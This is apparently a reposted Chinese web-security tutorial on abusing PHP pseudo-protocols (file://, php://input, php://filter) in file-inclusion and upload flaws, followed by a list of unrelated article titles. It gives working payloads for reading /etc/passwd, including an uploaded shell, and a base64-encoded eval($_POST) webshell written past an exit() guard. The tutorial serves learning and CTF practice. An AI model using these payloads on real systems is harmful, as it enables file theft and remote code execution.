当前位置: 首页 > news >正文

WEB安全--文件上传漏洞--php伪协议的利用

一、伪协议介绍

1.1、内容

在 PHP 中,伪协议通常指的是一种通过特定的 URL 协议方案实现某些特殊功能或行为的方式。伪协议通常并不是标准的协议(如 HTTP、HTTPS),而是由应用程序或开发者自定义的“伪”协议,用于执行某些特定任务。

1.2、各协议条件

伪协议allow_url_fopenallow_url_include描述及用途
file://需开启无影响访问本地文件:file_get_contents("file:///path/to/file")
php://input无影响无影响读取 HTTP 请求的原始数据流(如 POST 的 body):file_get_contents("php://input")
php://filter无影响无影响流式操作:如 Base64 编码、解码(结合 file:// 读取源码)
http://需开启需开启远程文件访问或 include(极不安全,建议禁用)
https://需开启需开启同上
ftp://需开启需开启FTP 访问文件(极不安全,建议禁用)
data://需开启无影响直接在脚本中内联数据流(极不安全,建议禁用)
zip://无影响无影响访问 ZIP 压缩包中的文件(无需开启远程访问)

二、利用方式

2.1、file://

介绍:

file:// 协议允许通过 PHP 函数访问本地文件。常见函数有:

  • file_get_contents()

  • fopen()

  • include / require

比如:

// 读取本地文件
echo file_get_contents("file:///etc/passwd");

示例:

1、任意文件读取
$file = $_GET['path'];
echo file_get_contents($file);  // 假设某应用支持动态文件读取

http://example.com/vuln.php?path=file:///etc/passwd  // payload



2、本地文件包含 (LFI)
$page = $_GET['page'];
include $page;                // include 动态文件

http://example.com/vuln.php?page=file:///etc/passwd  //payload


3、执行webshell
include "file:///var/www/uploads/shell.php";

2.2、php://input

介绍:

php://input 是 PHP 中的一个伪协议,用于读取原始的 POST 数据。与 $_POST 不同,php://input 不会经过 PHP 的解析器处理,可以获取到未经处理的原始数据流,通常用于接收如 JSON 或 XML 格式的请求体数据。

可以访问请求的原始数据只读流,将POST请求中的数据作为PHP代码执行。

示例:

后端过滤

‹?php
show_source(_FILE_);
include ('flag.php');

$a = $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
} 
else
{
die('no no no');
}

可以看到,如果我们想得到flag就得进入第一个判断,那条件是什么呢?

主要就是怎么在传参时满足这个条件:(file_get_contents($a,'r')) === 'I want flag')

普通思路可以想我们直接输入'I want flag'

也就是  127.0.0.1/include.php?a=I want flag

但是这是没有用的,因为服务器目录中没有'I want flag'这个文件,就算有其内容也不是'I want flag'

但是file_get_contents($a,'r')可以接收文件名,也可以接收原始数据流;并且php://input可以接收post传参(数据流式传递)

当file_get_contents()接收到流式数据就不会去找文件名,直接读取数据流内容。

所以payload:

127.0.0.1/include.php/a=php://input

I want flag     //同时post传参

2.3、php://filter

介绍:

php://filter 能对流式数据进行处理,可以结合 file_get_contentsincluderequirefopen 等函数,对目标文件做特定操作,比如:

  • convert.base64-encode:对文件内容进行 Base64 编码

  • convert.base64-decode:对 Base64 内容进行解码

  • string.strip_tags:移除 HTML 标签

  • string.rot13:对内容进行 ROT13 加密

示例:

绕过死亡exit():

<?php
$filename=$_GET['filename'];
$content=$_GET['content'];
file_put_contents($filename,"<?php exit();".$content);

$content在开头增加了exit过程,导致即使我们成功写入一句话,也执行不了。那么这种情况下,如何绕过这个“死亡exit”?

思路其实也很简单我们只要将content前面的那部分内容使用某种手段(编码等)进行处理,导致php不能识别该部分就可以了。

这里的$_GET[‘filename’]是可以控制协议的.

payload:

?filename=php://filter/convert.base64-
decode/resource=1.php&content=aPD9waHAgZXZhbCgkX1BPU1RbYV0pOw==

解析payload:

Base64编码是使用64个可打印ASCII字符(A-Z、a-z、0-9、+、/)将任意字节序列数据编码成ASCII字符串,另有“=”符号用作后缀用途。

base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码

当$content被加上了<?php exit; ?>以后,我们可以使用php://filter/write=convert.base64-decode来首先对其解码。在解码的过程中,字符< ? ; >空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有”phpexit”和我们传入的其他字符。

由于,”phpexit”一共7个字符,但是base64算法解码时是4个byte一组,所以我们可以随便再给他添加一个字符。这样前边的phpexit加上另一个字符就会被base64解码,然后后边的我们精心构造的base64字符串也会被成功解码为php代码。

http://www.dtcms.com/a/109551.html

相关文章:

  • MySQL索引(操作篇)
  • 分布式锁之redis6
  • GenerationMixin:_sample方法(GenerationMode.SAMPLE, GenerationMode.GREEDY_SEARCH)
  • 程序员学商务英语之Establing Biz Relations Inquiry
  • 自适应卡尔曼滤波
  • 探索 GitHub Copilot:当 AI 成为你的贴身编码助手
  • Win11本地从零开始部署dify全流程
  • TP6图片操作 Image::open 调用->save()方法时候报错Type is not supported
  • Redis基础知识-3
  • linux - 字符设备驱动简介
  • MySql 数据库题目
  • 三防笔记本有什么用 | 三防笔记本有什么特别
  • CentOS中挂载新盘LVM指南:轻松扩展存储空间,解决磁盘容量不足问题
  • ORM mybits mybits-plus
  • 探索现代网络技术:从负载均衡到 Kubernetes
  • ECMAScript介绍
  • 使用C#写的一个Kafka的使用工具
  • git的作用,以及和github的区别
  • 数据结构与算法学习笔记----贪心区间问题
  • C++中的IO流
  • 【动态规划】最长上升子序列模板
  • 网络编程—网络概念
  • 国产编辑器EverEdit - 扩展脚本:让EverEdit支持“批量查找”功能
  • 使用 requests 和 BeautifulSoup 解析淘宝商品
  • 安利免费开源的声音克隆、文本转语音整合包软件、一键本地安装!
  • Shopify独立站开发与运营全解析
  • iOS 18.4修复多个核心安全漏洞,间接增强Find My服务的数据保护能力
  • 基于javaweb的SSM羽毛球会员俱乐部系统场馆课程运动设计与实现(源码+文档+部署讲解)
  • 五种音频器件综合对比——《器件手册--音频器件》
  • 【C++游戏引擎开发】《几何算法》(2):OBB射线检测